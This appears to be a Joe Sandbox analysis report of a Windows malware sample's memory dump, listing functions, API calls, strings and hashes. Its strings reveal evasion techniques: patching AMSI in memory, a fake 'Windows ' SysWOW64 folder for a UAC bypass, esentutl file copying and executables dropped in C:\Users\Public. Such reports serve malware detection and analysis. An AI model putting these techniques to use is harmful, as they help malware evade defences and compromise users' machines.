C:\\Windows \\SysWOW64\\per.exe, xrefs: 02E643F5
lld.SLITUTEN, xrefs: 02E6480C
ScanString, xrefs: 02E63F03, 02E649C8, 02E64E08, 02E64FFD, 02E655B8, 02E65752, 02E65A97, 02E65E5B, 02E664F2, 02E66CD8, 02E66E4F, 02E66F07
C:\Users\Public\pha.exe, xrefs: 02E6551B
C:\Users\Public\CApha.exe, xrefs: 02E65500
URL=file:", xrefs: 02E66D57
C:\Users\Public\, xrefs: 02E65D88, 02E66FF3
C:\\Windows \\SysWOW64\\, xrefs: 02E64822
/o, xrefs: 02E664C0
C:\\Windows\\System32\\esentutl.exe /y , xrefs: 02E664AA

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
API String ID: 2171786310-3926298568
Opcode ID: f2c15c7aadc6d3381be350b105f4abe331dc56dce78068b0d699a7a6e38e2042
Instruction ID: 30abd09f4a7de87253beb135896256fb1c9fa09d365b5bcbf200f37570670730
Opcode Fuzzy Hash: f2c15c7aadc6d3381be350b105f4abe331dc56dce78068b0d699a7a6e38e2042
Instruction Fuzzy Hash: 07431B74BC015D9BDB10EB64EC81B9E73B6BB85304F6091E6A509BB654CF30AE82DF41

Function 02E5E678 Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02E589D0: FreeLibrary.KERNEL32(743E0000,00000000,00000000,00000000,00000000,02EC738C,Function_0000662C,00000004,02EC739C,02EC738C,05F5E103,00000040,02EC73A0,743E0000,00000000,00000000), ref: 02E58AAA

Part of subcall function 02E58788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E58814

Part of subcall function 02E5894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize,02EC73A8,02E5A93C,UacScan), ref: 02E58960
Part of subcall function 02E5894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E5897A
Part of subcall function 02E5894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize), ref: 02E589B6

WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02EC7380,02E5EF4C,OpenSession,02EC7380,02E5EF4C,UacScan,02EC7380,02E5EF4C,ScanBuffer,02EC7380,02E5EF4C,OpenSession,02EC7380), ref: 02E5ED6E
CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02EC7380,02E5EF4C,OpenSession,02EC7380,02E5EF4C,UacScan,02EC7380,02E5EF4C,ScanBuffer,02EC7380,02E5EF4C,OpenSession), ref: 02E5ED76
CloseHandle.KERNEL32(000008A8,00000000,00000000,000000FF,ScanString,02EC7380,02E5EF4C,OpenSession,02EC7380,02E5EF4C,UacScan,02EC7380,02E5EF4C,ScanBuffer,02EC7380,02E5EF4C), ref: 02E5ED7F

Strings

NtOpenProcess, xrefs: 02E5EED1
)"C:\Users\Public\Libraries\lxsyrsiW.cmd" , xrefs: 02E5E7F1, 02E5E9B3
AmsiOpenSession, xrefs: 02E5E814
ntdll, xrefs: 02E5EEC5, 02E5EED6
Initialize, xrefs: 02E5EB48, 02E5ED8B
ScanString, xrefs: 02E5E76A, 02E5E90F, 02E5EAD7, 02E5ECFF
ScanBuffer, xrefs: 02E5EBE6, 02E5EE29
OpenSession, xrefs: 02E5E711, 02E5E8B6, 02E5EA66, 02E5EB97, 02E5EC8E, 02E5EDDA
NtSetSecurityObject, xrefs: 02E5EEC0
Amsi, xrefs: 02E5E825
UacScan, xrefs: 02E5E6B8, 02E5E85D, 02E5E9F5, 02E5EC35, 02E5EE78

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
String ID: )"C:\Users\Public\Libraries\lxsyrsiW.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
API String ID: 3475578485-1053911981
Opcode ID: 2567eeea6fabad2ee467693f64dd669d2448d051c3a247d0f7983bf2b692cb97
Instruction ID: c6878294547683dbb5c1e5c870edadf453d376c36cb966d464df1a4a98ced7ca
Opcode Fuzzy Hash: 2567eeea6fabad2ee467693f64dd669d2448d051c3a247d0f7983bf2b692cb97
Instruction Fuzzy Hash: 51220234B902699BEB11FB65E881F8E73B6AF85300F54E0A1B504AB694DF30AE41CF55

Function 02E41724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 02E417D0
Sleep.KERNEL32(0000000A,00000000), ref: 02E417E6

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: df0a1454c7b76ddbe6b5505dd59df05d53bcb043b511618ff8551d2d3b58adac
Instruction ID: 08221208a99272f3063211c36f69c014b7b369bccbc04f3962a4645d68c3d563
Opcode Fuzzy Hash: df0a1454c7b76ddbe6b5505dd59df05d53bcb043b511618ff8551d2d3b58adac
Instruction Fuzzy Hash: 25B10272AC02408BCF15CFA9E494355BBE1EB86315F29D6BAE44D8F2C5DB7094D2CB90

Function 02E588B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 02E588C1

Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9

Part of subcall function 02E57D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E57DEC

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02E58920

Strings

DllGetClassObject, xrefs: 02E588E6
W, xrefs: 02E588CD
amsi, xrefs: 02E588BC

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 941070894-2671292670
Opcode ID: 615153ad0bbab0942eb02bd664444f573450f6b38a7ab38686d2094eab86cee4
Instruction ID: abd68e824dbbecb787fcc866f332769286cab024f3010753a18d0da35261822e
Opcode Fuzzy Hash: 615153ad0bbab0942eb02bd664444f573450f6b38a7ab38686d2094eab86cee4
Instruction Fuzzy Hash: 72F0A45049C381B9E300E3748C45F4BBECD4B62264F00DA58F5E89A2D2D675D1548767

Function 02E41A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,02E41FE4), ref: 02E41B17
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02E41FE4), ref: 02E41B31

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2cd3f95ea364003e425be0a3e2ea73a5bbdcfc5135d25863817df41918f67892
Instruction ID: a6bac1fc8db18414c2f9373e1892860c44ee9565992bd8045358014a5a1d1816
Opcode Fuzzy Hash: 2cd3f95ea364003e425be0a3e2ea73a5bbdcfc5135d25863817df41918f67892
Instruction Fuzzy Hash: E751B1716802408FDF15CF68E994756BBE0AB45318F28D5BEE84CCF286EB6094C5CB91

Function 02E5E4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02E5E5F6

Strings

OpenSession, xrefs: 02E5E598
ScanBuffer, xrefs: 02E5E53F
Initialize, xrefs: 02E5E4E6

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 473d849225076cfb405299d220c65f17173e920359c9915e39329bdd65d17251
Instruction ID: aa7e16760c5f3bef9f36e3e98cd2ff82e7ec056e7b4fcbe438c5235591f02190
Opcode Fuzzy Hash: 473d849225076cfb405299d220c65f17173e920359c9915e39329bdd65d17251
Instruction Fuzzy Hash: 2C415375B90158ABEB01EBA4E841FDE73FAEF88700F60D461F940A7680DE70AE018F55

Function 02E58788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON

Download Yara Rule

APIs

Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E

Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E58814

Strings

CreateProcessAsUserW, xrefs: 02E587A1
Kernel32, xrefs: 02E587D3

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$CreateProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 3130163322-2353454454
Opcode ID: aa176d005bda69586f301c766437b2d5f4369356895ccb56675fba6f62253880
Instruction ID: 2908c5059ee52f7887f1919e850c99ad35ea798ad64ddb68314391ecc2c719a5
Opcode Fuzzy Hash: aa176d005bda69586f301c766437b2d5f4369356895ccb56675fba6f62253880
Instruction Fuzzy Hash: 6211D6B2690248AFEB40EE9DED41F9A77EDEB4C700F919420BE08D3640C634ED508B24

Function 02E585BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON

Download Yara Rule

APIs

Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E

Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9

WinExec.KERNEL32(?,?), ref: 02E58624

Strings

Kernel32, xrefs: 02E58607
WinExec, xrefs: 02E585D5

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: a42835f072d13be2ec43d8a85533e49625236ccabe7207639ea39d39ae6a80bc
Instruction ID: bd81df018d1127e88faf919b1747f4ebcc336b95b3bfb174e9f2dda12fe43ced
Opcode Fuzzy Hash: a42835f072d13be2ec43d8a85533e49625236ccabe7207639ea39d39ae6a80bc
Instruction Fuzzy Hash: DC0181717D4244BFEB00EBE9EC42F5A7BEDE748700FA0E420BD00D2650DA74AD518E24

Function 02E585BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON

Download Yara Rule

APIs

Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E

Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9

WinExec.KERNEL32(?,?), ref: 02E58624

Strings

Kernel32, xrefs: 02E58607
WinExec, xrefs: 02E585D5

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: 09fd37d25c4c733a19e349c3755fee0974ecb7205a6170c7f0dfc46ac0f4dc75
Instruction ID: 1d03ed72986376380c63768ac81022c75c4fbf9252b3b31810f292d01a97d6a4
Opcode Fuzzy Hash: 09fd37d25c4c733a19e349c3755fee0974ecb7205a6170c7f0dfc46ac0f4dc75
Instruction Fuzzy Hash: F4F081717D4244BFEB00EBE5EC42F5A7BEDE748700FA0E420BD00D2650DA74AD518E24

Function 02E55C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02E55D74,?,?,02E53900,00000001), ref: 02E55C88
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02E55D74,?,?,02E53900,00000001), ref: 02E55CB6

Part of subcall function 02E47D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02E53900,02E55CF6,00000000,02E55D74,?,?,02E53900), ref: 02E47DAA

Part of subcall function 02E47F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02E53900,02E55D11,00000000,02E55D74,?,?,02E53900,00000001), ref: 02E47FB7

GetLastError.KERNEL32(00000000,02E55D74,?,?,02E53900,00000001), ref: 02E55D1B

Part of subcall function 02E4A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02E4C3D9,00000000,02E4C433), ref: 02E4A797

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: 0bda92ad237196620f1c68c9bf0df0886bb5b1a25cf4548c956cdb00e69bc576
Instruction ID: df116c062cce926004beeacf1d5e5676098362cea7e4a4d3d7c85561b94d5466
Opcode Fuzzy Hash: 0bda92ad237196620f1c68c9bf0df0886bb5b1a25cf4548c956cdb00e69bc576
Instruction Fuzzy Hash: 9E31A070E806149FDB00EFA9D881BEEB7F6AB09304F90D464E904AB380DB7559058FA1

Function 02E5F212 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02FBBA58), ref: 02E5F258
RegSetValueExA.ADVAPI32(00000594,00000000,00000000,00000001,00000000,0000001C,00000000,02E5F2C3), ref: 02E5F290
RegCloseKey.ADVAPI32(00000594,00000594,00000000,00000000,00000001,00000000,0000001C,00000000,02E5F2C3), ref: 02E5F29B

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 88f6021505666f65b1521608fc5ba046bda713dfaad6465a4a2c1f1ce1ebd716
Instruction ID: 4ea3b88174cdabbada415dab09ab7506b9fd4242a7df8b459747433fb3c7f25c
Opcode Fuzzy Hash: 88f6021505666f65b1521608fc5ba046bda713dfaad6465a4a2c1f1ce1ebd716
Instruction Fuzzy Hash: 31113075B84208BFDB01EF68E881E9DB7EDEB0A740B40A461BA04D7690DF34DE009F54

Function 02E5F214 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02FBBA58), ref: 02E5F258
RegSetValueExA.ADVAPI32(00000594,00000000,00000000,00000001,00000000,0000001C,00000000,02E5F2C3), ref: 02E5F290
RegCloseKey.ADVAPI32(00000594,00000594,00000000,00000000,00000001,00000000,0000001C,00000000,02E5F2C3), ref: 02E5F29B

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 7aa481b3bfedf242d3844c5e0b900d886b37357490a8665ea94f7e8357a197a9
Instruction ID: a82455e461d6ad0010b556a28639985b8367230e9179f6307da1f81a4a9c3c7b
Opcode Fuzzy Hash: 7aa481b3bfedf242d3844c5e0b900d886b37357490a8665ea94f7e8357a197a9
Instruction Fuzzy Hash: E1114275B84208BFDB01EF64E881E9DB7EDEB0A740F40A461BA04D7690DF34DA009F54

Function 02E4E364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 02E4E373

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 721efa4d6c2dd680627b77164b13edf120d5b11f2c8e24ae2636d7f315e7b4fd
Instruction ID: 6ffcbb9817226e89f8f5de1126901c9d9e7c2f4386ef63f8eb289334f090e264
Opcode Fuzzy Hash: 721efa4d6c2dd680627b77164b13edf120d5b11f2c8e24ae2636d7f315e7b4fd
Instruction Fuzzy Hash: 42F0C2607C9110C78B267B39BC84AA9279A7F4034CB58F876B4069B205CF64CC45CB62

Function 02E44D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(02E5F4A4), ref: 02E44C6E
SysAllocStringLen.OLEAUT32(?,?), ref: 02E44D5B
SysFreeString.OLEAUT32(00000000), ref: 02E44D6D

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e40000_x.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
Instruction ID: 5b555c9ac6f58f2e94433a509ea31f4479a3af533a299bba45e5797f6e6f8f74
Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
Instruction Fuzzy Hash: 37E0ECB82852055EFE146F21B940B76222AAFC2784B18E499B804CE194DF389580AD3C

Function 02E570DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 02E573DA

Strings

H, xrefs: 02E57191

Memory Dump Source

Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
